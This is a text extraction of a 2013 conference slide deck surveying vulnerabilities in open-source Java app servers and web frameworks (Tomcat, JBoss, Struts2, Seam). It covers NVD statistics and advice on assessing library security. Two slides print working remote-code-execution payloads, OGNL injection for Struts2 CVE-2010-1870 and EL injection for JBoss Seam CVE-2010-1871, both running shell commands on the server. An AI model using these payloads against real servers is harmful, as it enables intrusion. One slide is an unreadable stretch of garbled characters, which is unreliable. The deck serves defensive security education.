Security Vulnerabili&es in Open Source Java Libraries - Yonita

seedjaggedInternet and Web Development

Nov 12, 2013 (3 years and 5 months ago)

69 views

Security  
Vulnerabili/es
 in  Open  
Source  Java  Libraries  
Patrycja  
Wegrzynowicz
 
CTO,  
Yonita
,  Inc.  
About
 Me  


Programmer  at  heart  


Researcher  in  mind  


Speaker  with  passion    


Entrepreneur  by  need  
@
yonlabs
 
Agenda  


Mo/va/on
 and  
methodology
 


Security  
vulnerabili/es
 


Stats
 and  
examples
 


App
 and  web  
servers
 


Web  
frameworks
 


Approach
 to  
security
 


What
 to  
look
 for  


Where
 to  
look
 
at
 
Disclaimer
 
 
 
 
I  do  not  
aim
 
at
 
bashing
 OSS!  
Hello  World  in  
cloud
 
is
 
involve
 1  
load
 
balancer
,  3  
web  
server
 and  2  
database
 
server
 
DevOps_Borat
,  
Twi2er
 
Underneath
 
Applica/on  
Libraries  
App
 &  Web  
Servers
 
Databases  
Opera/ng  Systems  
Infrastructure
 
Underneath
 
Applica/on  
Libraries  
App
 &  Web  
Servers
 
Databases  
Opera/ng  Systems  
Infrastructure
 
Sources
 


The  
Na/onal
 
Vulnerability
 Database  


NIST  
Computer
 Security  
Division
 


DHS  Na/onal  Cyber  Security  Division/US  CERT  


hXp://
nvd.nist.gov
/  


The  Open  Source  
Vulnerability
 Database    


Open  Security  Founda/on  


hXp://
www.osvdb.org
/  


The  
Exploit
 Database  


hXp://
www.exploit-­‐db.com
/  
Common
 
Vulnerability
   
Scoring
 System  v2  
Access  
Vector
 
Local
 
Adjecent
 network  
Remote  
Access  
Complexity
 
High  
Medium  
Low
 
Authen/ca/on
 
Mul/ple
 
instances
 
Single  
instance
 
None
 
Confiden/ality
 
None
 
Par/al
 
Complete  
Integrity
 
None
 
Par/al
 
Complete  
Availability
 
None
 
Par/al
 
Complete  
Common
 
Weakness
 
Enumera/on
 
Vulnerability
 
Types
 
NVD  to  CWE  
Mapping
 
Authen/ca/on
 
Issues
 
Creden/als
 
Management  
Permissions
,  
Privileges
,  and  
Access  Control  
Buffer
 
Errors
 
Cross-­‐Site  
Request
 
Forgery
 (CSRF)  
Cross-­‐Site  
Scrip/ng  (XSS)  
Cryptographic
 
Issues
 
Path
 
Traversal
 
Code
 
Injec/on
 
Format  String  
Vulnerability
 
Configura/on
 
Informa/on  
Leak
/
Disclosure
 
Input  
Valida/on
 
Numeric
 
Errors
 
OS  
Command
 
Injec/ons
 
Race  
Condi/on
 
Resource  
Management  
Errors
 
SQL  
Injec/on
 
Link  
Following
 
Other
 
Not  in  CWE  
Insufficient
 
Informa/on  
Design  Error  
App
 &  Web  
Servers
 
App
 &  Web  
Servers
 
Tomcat  
33%  
JBoss  
26%  
WebLogic  
10%  
JeXy  
8%  
GlassFish  
8%  
WebSphere  
7%  
Other  
8%  
Survey
 by  
ZeroTurnaround
 
Number
 of  
Vulnerabili/es
 
 OSS  
100  
7  
20  
14  
20  
Tomcat  
Jboss  AS  
Jboss  EAP  
GlassFish  
JeXy  
Based
 on  NVD  
Number
 of  
Vulnerabili/es
 
OSS  and  
Proprietrary
 
100  
7  
20  
14  
20  
185  
201  
Tomcat  
Jboss  AS  
Jboss  EAP  
GlassFish  
JeXy  
WebLogic  
WebSphere  
Based
 on  NVD  
Number
 of  
Vulnerabili/es
 
OSS  vs  
Proprietary
 
OSS  (5  
plamorms)  
29%  
Proprietary  (2  
plamorms)  
71%  
Based
 on  NVD  
Vulnerabili/es
 by  
Year
 
OSS  
0  
2  
4  
6  
8  
10  
12  
14  
16  
18  
20  
2000  
01  
02  
03  
04  
05  
06  
07  
08  
09  
10  
11  
12  
Tomcat  
Jboss  AS  
Jboss  EAP  
GlassFish  
JeXy  
Based
 on  NVD  
Vulnerabili/es
 by  
Year
 
OSS  +  
Proprietary
 
0  
5  
10  
15  
20  
25  
30  
35  
40  
45  
50  
2000  
01  
02  
03  
04  
05  
06  
07  
08  
09  
10  
11  
12  
Tomcat  
Jboss  AS  
Jboss  EAP  
GlassFish  
JeXy  
WebLogic  
WebSphere  
Based
 on  NVD  
Vulnerabili/es
 by  
Year
 
OSS  
0  
5  
10  
15  
20  
25  
30  
2000  
01  
02  
03  
04  
05  
06  
07  
08  
09  
10  
11  
12  
JeXy  
GlassFish  
Jboss  EAP  
Jboss  AS  
Tomcat  
Based
 on  NVD  
Vulnerabili/es
 by  
Year
 
OSS  and  
Proprietary
 
0  
10  
20  
30  
40  
50  
60  
70  
80  
90  
2000  
01  
02  
03  
04  
05  
06  
07  
08  
09  
10  
11  
12  
WebSphere  
WebLogic  
JeXy  
GlassFish  
Jboss  EAP  
Jboss  AS  
Tomcat  
Based
 on  NVD  
Vulnerabili/es
 
Scoring
 
0  
1  
4  
2  
0  
20  
21  
80  
2  
13  
10  
17  
122  
126  
10  
4  
2  
1  
3  
32  
28  
1  
1  
10  
29  
Tomcat  
Jboss  AS  
Jboss  EAP  
GlassFish  
JeXy  
WebLogic  
WebSphere  
LOW  [0,4)  
MEDIUM  [4,7)  
HIGH  [7,8]  
CRITICAL  [8,9)  
WTF?!  [9,10]  
Based
 on  NVD  
Confiden/ality
 
Impact
 
36  
0  
6  
7  
8  
51  
71  
62  
6  
13  
6  
12  
112  
99  
2  
1  
0  
1  
0  
22  
32  
0%  
10%  
20%  
30%  
40%  
50%  
60%  
70%  
80%  
90%  
100%  
None  
Par/al  
Complete  
Based
 on  NVD  
Integrity
 
Impact
 
55  
2  
10  
5  
9  
76  
71  
45  
4  
9  
8  
11  
91  
99  
0  
1  
0  
1  
0  
18  
32  
0%  
10%  
20%  
30%  
40%  
50%  
60%  
70%  
80%  
90%  
100%  
None  
Par/al  
Complete  
Based
 on  NVD  
Availability
 
Impact
 
71  
2  
11  
6  
14  
82  
71  
28  
4  
9  
5  
6  
83  
99  
1  
1  
0  
3  
0  
20  
32  
0%  
10%  
20%  
30%  
40%  
50%  
60%  
70%  
80%  
90%  
100%  
None  
Par/al  
Complete  
Based
 on  NVD  
Vulnerability
 
Types
 by  Server  
0%  
20%  
40%  
60%  
80%  
100%  
Authen/ca/on  Issues  
Creden/als  Management  
Permissions,  Privileges,  and  Access  Control  
Buffer  Errors  
CSRF  
XSS  
Cryptographic  Issues  
Path  Traversal  
Code  Injec/on  
Configura/on  
Informa/on  Leak  
Input  Valida/on  
Numeric  Errors  
Race  Condi/on  
Resource  Management  Errors  
SQL  Injec/on  
Link  Following  
Design  Error  
Unknown  
Based
 on  NVD  
Top  3  
Vulnerabili/es
 
1  
9  
1  
7  
7  
22  
1  
11  
2  
3  
5  
4  
26  
3  
13  
2  
6  
19  
5  
1  
Tomcat  
Jboss  AS  
Jboss  EAP  
GlassFish  
JeXy  
WebLogic  
WebSphere  
Creden/als  Management  
Permissions…  
CSRF  
XSS  
Path  Traversal  
Informa/on  Leak  
Input  Valida/on  
Based
 on  NVD  
3  and  
More
 
Vulnerabili/es
 
7  
4  
9  
7  
7  
22  
4  
11  
3  
5  
4  
26  
10  
8  
3  
3  
13  
6  
19  
3  
5  
14  
12  
8  
3  
Tomcat  
Jboss  AS  
Jboss  EAP  
GlassFish  
JeXy  
WebLogic  
WebSphere  
Authen/ca/on  Issues  
Creden/als  Management  
Permissions,...l  
CSRF  
XSS  
Cryptographic  Issues  
Path  Traversal  
Configura/on  
Informa/on  Leak  
Input  Valida/on  
Resource  Management  Errors  
Design  Error  
Based
 on  NVD  
Total  
Vulnerabili/es
 by  
Type
 
0  
10  
20  
30  
40  
50  
60  
Cross-­‐Site  Scrip/ng  (XSS)  
Permissions,  Privileges,  
Informa/on  Leak  
Input  Valida/on  
Resource  Management  
Design  Error  
Cryptographic  Issues  
Path  Traversal  
Authen/ca/on  Issues  
Creden/als  Management  
Cross-­‐Site  Request  
Configura/on  
Buffer  Errors  
Code  Injec/on  
Numeric  Errors  
Race  Condi/on  
Link  Following  
SQL  Injec/on  
WebSphere  
WebLogic  
JeXy  
GlassFish  
Jboss  EAP  
Jboss  AS  
Tomcat  
Based
 on  NVD  
Max  CVSS  v2:  10  


CVE-­‐2011-­‐0807    


20-­‐04-­‐2011  


Unspecified
 
vulnerability
 in  
Oracle
 Sun  
GlassFish
 Enterprise  Server  
2.1,  2.1.1,  and  3.0.1,  and  Sun  Java  System  Applica/on  Server  9.1,  
allows
 
remote
 
aXackers
 to  
affect
 
confiden/ality
,  
integrity
,  and  
availability
 via  
unknown
 
vectors
 
related
 to  Administra/on.    


AV:  Network  


AC:  
Low
   


Au:  
None
 
required
   


C:  Complete    


I:  Complete    


A:  Complete  


Insufficient
 
informa/on
 
Min  CVSS  v2:  1.2  


CVE-­‐2010-­‐3718    


2/10/11    


Apache  
Tomcat
 7.0.0  
through
 7.0.3,  6.0.x,  and  5.5.x,  
when
 
running
 
within
 a  
SecurityManager
,  
does
 not  
make
 the  
ServletContext
 
aXribute
 
read-­‐only
,  
which
 
allows
 
local
 web  
applica/ons
 to  
read
 
or
 
write
 
files
 
outside
 of  the  
intended
 
working
 
directory
,  as  
demonstrated
 
using
 a  
directory
 
traversal
 
aXack
.    


AV:  
Local
 
access
   


AC:  High  


Au:  
None
 
required
   


C:  
None
   


I:  
Par/al
   


A:  
None
 


Design  Error    
Web  
Frameworks
 
Vulnerabili/es
 
Selected
 
Frameworks
 
0  
2  
4  
6  
8  
10  
12  
14  
16  
Vulnerabili/es  
Struts2  
Jboss  Seam  
GWT  
Apache  
Struts
 2  (
latest
 
release
 2.3.4.1)  
!"#$%&
'()*+,-
./01*
2//*,,
!03)4*567(
2879*:76/;760:
!0:<6=*:76;467(
%:7*>167(
2?;64;@6467(
!"#$%&'%$()*+
,-.
/
012-31
4-5
6-37819:;81<
6-=1
6-=1
>?83;?@
!"#$%&'%$()*A
!.0B
AC*
012-31
D1<;:2
6-37819:;81<
>?83;?@
>?83;?@
>?83;?@
!"#$%&'%$'&&A
E..
(C)
012-31
D1<;:2
6-37819:;81<
6-=1
>?83;?@
6-=1
!"#$%&'%$&*)*
#F1G7!-<1
+C/
012-31
4-5
6-37819:;81<
>?83;?@
>?83;?@
>?83;?@
!"#$%&'%$&)H(
#F1G7!-<1
AC*
012-31
D1<;:2
6-37819:;81<
>?83;?@
>?83;?@
>?83;?@
!"#$%&'%$&)H)
AC(
012-31
4-5
6-37819:;81<
6-=1
>?83;?@
>?83;?@
!"#$%&'%$&)H%
#F1G7!-<1
HC)
012-31
D1<;:2
6-37819:;81<
!-2I@131
!-2I@131
!-2I@131
!"#$%&'%$&)H'
#F1G7!-<1
HC)
012-31
D1<;:2
6-37819:;81<
!-2I@131
!-2I@131
!-2I@131
JK17>?8?21318L=318G1I3-87G-2I-=1=37;=7MI?GK17.38:3N7O1P-817%C)C'C'7<-1N7=-37I81Q1=37?GG1NN73-7I:O@;G7G-=N38:G3-8NR75K;GK7
?@@-5N7812-317?33?GS18N73-7G81?317-87-Q1858;317?8O;38?8T7P;@1N7Q;?7?7G8?P31<7I?8?2131873K?3738;UU18N73K17G81?3;-=7-P7?7V?Q?7-OW1G3C
JK17#FG1I3;-=,1@1U?3-87G-2I-=1=37;=7MI?GK17.38:3N7O1P-817%C%C)C'7;=318I813N7I?8?213187Q?@:1N7?N7XY6471FI81NN;-=N7<:8;=U7
G183?;=71FG1I3;-=7K?=<@;=U7P-872;N2?3GK1<7<?3?73TI1N7-P7I8-I183;1NR75K;GK7?@@-5N7812-317?33?GS18N73-71F1G:317?8O;38?8T7V?Q?7G-<17
MI?GK17.38:3N7%C&C&73K8-:UK7%C)C(7?@@-5N7812-317?33?GS18N73-7G?:N17?7<1=;?@7-P7N18Q;G17Z!>[7G-=N:2I3;-=\7Q;?7?7@-=U7I?8?213187
=?21R75K;GK7;N7I8-G1NN1<7?N7?=7XY6471FI81NN;-=C
JK173-S1=7GK1GS721GK?=;N27;=7MI?GK17.38:3N7%C&C&73K8-:UK7%C)C(7<-1N7=-37I8-I18@T7Q?@;<?3173K173-S1=7=?217G-=P;U:8?3;-=7
I?8?21318R75K;GK7?@@-5N7812-317?33?GS18N73-7I18P-827G8-NN$N;317819:1N37P-8U18T7Z!.0B\7?33?GSN7OT7N133;=U73K173-S1=7=?217
D:@3;I@17G8-NN$N;317NG8;I3;=U7ZE..\7Q:@=18?O;@;3;1N7;=7MI?GK17.38:3N7%C&C'(7?=<7%C%C)7?@@-57812-317?33?GS18N73-7;=W1G37?8O;38?8T751O7
NG8;I37-87]JD47Q;?73K17Z'\7=?217-87Z%\7@?N36?217I?8?2131873-7N38:3N%$NK-5G?N1^I18N-=^1<;3>18N-=C?G3;-=R7-873K17Z)\7G@;1=36?217
MI?GK17.38:3N7%7O1P-817%C%C)C'71Q?@:?31N7?7N38;=U7?N7?=7XY6471FI81NN;-=7<:8;=U73K17K?=<@;=U7-P7?7G-=Q18N;-=7188-8R75K;GK7?@@-5N7
812-317?33?GS18N73-72-<;PT78:=$3;217<?3?7Q?@:1NR7?=<7G-=N19:1=3@T71F1G:317?8O;38?8T7G-<1R7Q;?7;=Q?@;<7;=I:373-7?7P;1@<C
__7,L.>[J#,7__7JK17,1O:UU;=UL=318G1I3-87G-2I-=1=37;=7MI?GK17.38:3N7O1P-817%C)C'C'R75K1=7<1Q1@-I1872-<17;N7:N1<R7?@@-5N7
812-317?33?GS18N73-71F1G:317?8O;38?8T7G-22?=<N7Q;?7:=NI1G;P;1<7Q1G3-8NC76XJ#`73K17Q1=<-87GK?8?G318;a1N73K;N7O1K?Q;-87?N7=-37b?7
JK17!--S;1L=318G1I3-87G-2I-=1=37;=7MI?GK17.38:3N7O1P-817%C)C'C'7<-1N7=-37:N173K17I?8?21318$=?2175K;31@;N3R75K;GK7?@@-5N7
812-317?33?GS18N73-71F1G:317?8O;38?8T7G-22?=<N7Q;?7?7G8?P31<7]JJ>7!--S;17K1?<1873K?3738;UU18N7V?Q?7G-<171F1G:3;-=73K8-:UK7?7
CVE-­‐2010-­‐1870  
exploit
 (Struts2)  


Found
 by  and  
exploit
 
shown
 by  
Meder
 
Kydyraliev
 


Based
 on  
his
 
previous
 
bug
:  XW-­‐641  


('\u0023'  +  'session[\'user\']')(unused)=0wn3d  


#session['user']=0wn3d  


Ac/onContext.getContext
().
getSession
().put
(“user”,  “0wn3d”)
 


ParametersInterceptor
 
blacklists
 #  to  
prevent
 
tampering
 with  
server-­‐side
 data  
CVE-­‐2010-­‐1870:  
Struts
 2  


8/17/10    


The  OGNL  
extensive
 
expression
 
evalua/on
 
capability
 in  
XWork
 in  
Struts
 2.0.0  
through
 2.1.8.1,  as  
used
 in  
Atlassian
 
Fisheye
,  
Crucible
,  and  
possibly
 
other
 
products,  
uses
 a  
permissive
 
whitelist
,  
which
 
allows
 
remote
 
aXackers
 to  
modify
 
server-­‐side
 
context
 
objects
 and  bypass  the    #    
protec/on
 
mechanism
 in  
ParameterInterceptors
 via  the  (1)  #
context
,  (2)  #_
memberAccess
,  (3)  #
root
,  (4)  
#
this
,  (5)  #_
typeResolver
,  (6)  #_
classResolver
,  (7)  #_
traceEvalua/ons
,  (8)  
#_
lastEvalua/on
,  (9)  #_
keepLastEvalua/on
,  and  
possibly
 
other
 OGNL  
context
 
variables
,  a  
different
 
vulnerability
 


AV:  Network    


AC:  
Low
   


Au:  
None
 
required
   


C:  
None
   


I:  
Par/al
   


A:  
None
   


[Design  Error  (NVD-­‐CWE-­‐
DesignError
)]    
CVE-­‐2010-­‐1870  
exploit
 


Guards
:  


xwork.MethodAccessor.denyMethodExecu/on
 


#_
memberAccess.allowSta/cAccess
 


Exploit
 by  
Meder
 
Kydyraliev
 


#_
memberAccess
[‘
allowSta/cMethodAccess
’]  =  
true
   


#
foo
 =  
new
 
java.lang.Boolean
(“
false
”)  


#
context
[‘
xwork.MethodAccessor.denyMethodExecu/on
’]  =  #
foo
   


#
rt
 =  @
java.lang.Run/me@getRun/me
()  


#
rt.exec
(“
touch
 /
tmp
/
dir
”,  
null
)  
/
HelloWorld.ac/on
?('\u0023_memberAccess  
[\'
allowSta/cMethodAccess
\']')(
meh
)=
true
&(
aaa
)(('\u0023context  
[\'
xwork.MethodAccessor.denyMethodExecu/on
\']\u003d\u0023foo')  
(\u0023foo\u003dnew%20java.lang.Boolean("
false
")))&(
ssss
)
((\u0023rt\  ('
mkdir
\u0020/
tmp
/PWNED'\u002cnull)))=1
 
CVE-­‐2010-­‐1871:  
JBoss
 
Seam
   


08/05/2010  


JBoss
 
Seam
 2  (jboss-­‐seam2),  as  
used
 in  
JBoss
 
Enterprise  Applica/on  Plamorm  4.3.0  for  Red  
Hat
 Linux,  
does
 not  
properly
 
sani/ze
 
inputs
 for  
JBoss
 
Expression
 
Language  (EL)  
expressions
,  
which
 
allows
 
remote
 
aXackers
 to  
execute
 
arbitrary
 
code
 via  a  
craed
 URL.  
NOTE:  
this
 
is
 
only
 a  
vulnerability
 
when
 the  Java  
Security  Manager  
is
 not  
properly
 
configured
.  


6.8  


(AV:N/AC:M/Au:N/C:P/I:P/A:P)
 


Input  
Valida/on
 
CVE-­‐2010-­‐1871  
exploit
 


Found
 by  and  
exploit
 
provided
 by  
Meder
 
Kydyraliev
 
/
seam-­‐booking
/
home.seam?ac/onOutcome
=/
pwn.xhtml?pwned%3d%23  
{
expressions.getClass
().
forName
 
('
java.lang.Run/me
').
getDeclaredMethods
()
[19].
invoke
 (
expressions.getClass
().
forName
('
java.lang.R
 
un/me
').
getDeclaredMethods
()
[7].
invoke
(
null
),  '
mkdir
 /
tmp
/  PWNED')}  
How  to  
Assess
 the  Security  Level  
of  a  Library?  
What
 to  
Look
 For?  
Vulnerabili/es
 
and  trend  
Complexity
 
Culture
 
Complexity
 
 
 
Culture
 
 
The  best  indicator  of  the  library’s  future  security  
is  culture  that  places  value  on  security  and  clear  
evidence  of  broad  and  rigorous  security  analysis.  
Jeff  Williams,  CEO,  Aspect  Security  
 
What
 to  
Look
 For?  


Known
 
security
 
vulnerabili/es
 in  
an
 OSS  
library
 and  
trends
 


Library  
complexity
,  
its
 design  and  
its
 
dependencies
 


Security  in  soware  development  
process
 of  
an
 OSS  
library
 


Security  
during
 development  


Security  
built
 
into
 the  development  
process
 


Security  
during
 
issue
 
handling
 


Clear
 and  transparent  
issue
 
handling
 


Undisclosed
 
details
 
un/l
 
fixed
 


Security  
response
 team  


Security  
bulle/ns
 


Releases
 and  
release
 notes  
containing
 
security
 
informa/on
 
Where
 to  
Look
 At?  


Vulnerability
 Databases  


Open  Source  
Vulnerability
 Database  


Na/onal
 
Vulnerability
 Database  


Exploit
 Database  


Vendor
 
site
 


Development  
process
 


Issue
 
tracker
 


Security  
bulle/ns
 


Release
 notes  


Dependency
 
hell
 


Use
 
support
 of  a  
dependency
 management  
tool
 (
e.g
.  
update
 
reports
 in  
maven
)  
 
patrycja@yonita.com
 
     @
yonlabs